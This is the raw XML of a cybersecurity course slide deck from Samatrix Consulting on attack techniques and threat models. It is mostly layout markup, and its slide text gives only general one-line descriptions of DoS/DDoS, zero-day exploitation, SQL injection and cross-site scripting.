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18288000" cy="10287000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Roboto Condensed Light" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId95"/>
      <p:bold r:id="rId96"/>
      <p:italic r:id="rId97"/>
      <p:boldItalic r:id="rId98"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId99"/>
      <p:bold r:id="rId100"/>
      <p:italic r:id="rId101"/>
      <p:boldItalic r:id="rId102"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Condensed" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId103"/>
      <p:bold r:id="rId104"/>
      <p:italic r:id="rId105"/>
      <p:boldItalic r:id="rId106"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Condensed Medium" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId107"/>
      <p:bold r:id="rId108"/>
      <p:italic r:id="rId109"/>
      <p:boldItalic r:id="rId1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54"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font" Target="fonts/font13.fnt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8.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1.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9.fntdata"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font1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2.fntdata"/><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font" Target="fonts/font5.fntdata"/><Relationship Id="rId10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5.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3.fntdata"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font10.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16.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6.fntdata"/><Relationship Id="rId105"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057286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23780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159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195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219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5134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990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5893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008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92586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1" name="Google Shape;36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7190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592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7863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2284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819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5112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694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9180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6" name="Google Shape;4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763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0373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41329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8991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6" name="Google Shape;52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04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02072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1" name="Google Shape;54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35548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3548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1" name="Google Shape;57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7777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0015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14964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6" name="Google Shape;616;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4979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55509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6" name="Google Shape;64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58687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1" name="Google Shape;66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4281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6" name="Google Shape;67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621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847098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1" name="Google Shape;691;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85376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6" name="Google Shape;70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7333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1" name="Google Shape;72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3841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4" name="Google Shape;744;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1163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9" name="Google Shape;759;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45875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99103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1031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4" name="Google Shape;804;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7845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9" name="Google Shape;81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25573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6" name="Google Shape;85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38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516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9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="870" name="Google Shape;870;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1" name="Google Shape;871;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52098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6" name="Google Shape;88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9521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70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6" name="Google Shape;916;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7079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1" name="Google Shape;931;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465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8" name="Google Shape;948;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6456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3" name="Google Shape;96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7571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8" name="Google Shape;978;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0311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3" name="Google Shape;99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59249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8" name="Google Shape;1008;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4376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81578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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1022" name="Google Shape;1022;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3" name="Google Shape;102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9393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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1037" name="Google Shape;1037;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8" name="Google Shape;1038;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098119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3" name="Google Shape;1053;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6576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8" name="Google Shape;1068;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70952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3" name="Google Shape;1083;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36713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8" name="Google Shape;1098;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934537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1" name="Google Shape;1141;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946495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7" name="Google Shape;1157;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32941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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171" name="Google Shape;1171;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2" name="Google Shape;1172;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26676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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1186" name="Google Shape;1186;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7" name="Google Shape;1187;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585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28904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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1201" name="Google Shape;1201;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2" name="Google Shape;120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0585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7" name="Google Shape;1217;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2564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2" name="Google Shape;1232;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51355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7" name="Google Shape;1247;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870723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2" name="Google Shape;1262;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76546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7" name="Google Shape;1277;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9793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2" name="Google Shape;1292;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8500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7" name="Google Shape;1307;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250120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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1321" name="Google Shape;1321;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2" name="Google Shape;1322;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61100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7" name="Google Shape;1337;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9541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4616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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1351" name="Google Shape;1351;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2" name="Google Shape;1352;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3538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7" name="Google Shape;1367;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6906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2" name="Google Shape;1382;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5685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7" name="Google Shape;1397;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112217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2" name="Google Shape;1412;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9405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7" name="Google Shape;1427;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34538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2" name="Google Shape;1442;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71827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
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1456" name="Google Shape;1456;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7" name="Google Shape;1457;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192205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
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1471" name="Google Shape;1471;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2" name="Google Shape;1472;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668884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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1486" name="Google Shape;1486;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7" name="Google Shape;1487;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3526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78397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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1501" name="Google Shape;1501;p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2" name="Google Shape;1502;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84597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p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7" name="Google Shape;1517;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89479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p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2" name="Google Shape;1532;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346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gi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2.gi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9.png"/></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9050" y="0"/>
            <a:ext cx="1828800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t="-33329" b="-44438"/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Google Shape;85;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2852138" y="8737959"/>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Samatrix Consulting Private Limited</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Google Shape;86;p13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3831771" y="1"/>
            <a:ext cx="7883557" cy="2002536"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10511409" h="2670048" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="10511409" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10321544" y="129159"/>
                  <a:pt x="10126472" y="253111"/>
                  <a:pt x="9926320" y="371856"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6041009" y="2670048"/>
                  <a:pt x="1703959" y="2478913"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10511409" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="5C24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0" y="8857996"/>
            <a:ext cx="2852167" cy="1429036"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3802888" h="1905381" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="3802888" y="1905381"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="1905381"/>
                  <a:pt x="0" y="1905381"/>
                  <a:pt x="0" y="1905381"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="0"/>
                  <a:pt x="0" y="0"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1633982" y="122809"/>
                  <a:pt x="3010027" y="764794"/>
                  <a:pt x="3802888" y="1905381"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="5C2421"/>
              </a:gs>
              <a:gs pos="10000">
                <a:srgbClr val="5C2421"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="B84742"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="108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3212501" y="6903333"/>
            <a:ext cx="5075499" cy="3383665"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5075499" h="3383665" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5075499" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5075499" y="3383665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3383665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect t="-29" b="-28"/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Google Shape;89;p13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13327874" y="2781337"/>
            <a:ext cx="4220828" cy="3178811"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4220828" h="3178811" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4220827" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4220827" y="3178810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3178810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect t="-12" b="-11"/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="90" name="Google Shape;90;p13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5004">
            <a:off x="2885275" y="9186146"/>
            <a:ext cx="6543532" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="rnd" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Google Shape;91;p13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2997095" y="9348446"/>
            <a:ext cx="274320" cy="274320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="274320" h="274320" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="274320" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274320" y="274320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="274320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId6">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Google Shape;92;p13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2997095" y="9757980"/>
            <a:ext cx="274320" cy="274320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="274320" h="274320" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="274320" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274320" y="274320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="274320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId7">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Google Shape;93;p13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="94872" y="1256575"/>
            <a:ext cx="1631840" cy="1158226"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1631840" h="1158226" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1631839" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1631839" y="1158227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1158227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId8">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect l="-175958" t="-28215" r="-7745" b="-28007"/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="Google Shape;94;p13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13327874" y="480748"/>
            <a:ext cx="4465336" cy="1357402"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4465336" h="1357402" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4465336" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4465336" y="1357403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1357403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId9">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Google Shape;95;p13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349253" y="7942022"/>
            <a:ext cx="2153631" cy="2030398"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2153631" h="2030398" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2153631" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2153631" y="2030399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2030399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId10">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln w="38100" cap="sq" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="8000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Google Shape;96;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196253" y="2151066"/>
            <a:ext cx="13004745" cy="5194935"/>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7200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>UNIT - 2 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9900" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>ATTACK TECHNIQUES USED IN CYBER CRIME AND THREAT MODELS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="Google Shape;97;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2885279" y="7894485"/>
            <a:ext cx="6588686" cy="419100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120007"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2699" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="5C2421"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Anindya Sinha</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="Google Shape;98;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2885279" y="8304060"/>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Cyber Security Analyst</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="Google Shape;99;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3414290" y="9248775"/>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anindya.sinha@samatrix.io</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Google Shape;100;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3414289" y="9686925"/>
            <a:ext cx="6588686" cy="371475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="119958"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>9952061704</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;101;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5791498" y="87632"/>
            <a:ext cx="3035002" cy="941068"/>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2700" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Cyber Security</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>DU # 2101CS632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30" name="Google Shape;230;p2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31" name="Google Shape;231;p2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32" name="Google Shape;232;p2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33" name="Google Shape;233;p2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34" name="Google Shape;234;p2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35" name="Google Shape;235;p2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36" name="Google Shape;236;p2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37" name="Google Shape;237;p2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TECHNIQUES</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Google Shape;238;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="216000" y="1469136"/>
            <a:ext cx="16392425"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Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) Attacks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Flooding a website with excessive traffic (DoS).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Coordinating a large number of compromised computers to flood a target (DDoS).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Exploiting Zero-Day Vulnerabilities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Exploiting newly discovered security flaws before a patch is available.</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Developing and deploying malware that leverages unknown vulnerabilities.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SQL Injection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Inserting SQL code into input fields to manipulate a database.</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Tampering with SQL queries to extract or modify sensitive information.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Cross-Site Scripting (XSS)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Embedding scripts in input fields to execute code in users' browsers.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Delivering malicious scripts through manipulated website content.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239" name="Google Shape;239;p2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45" name="Google 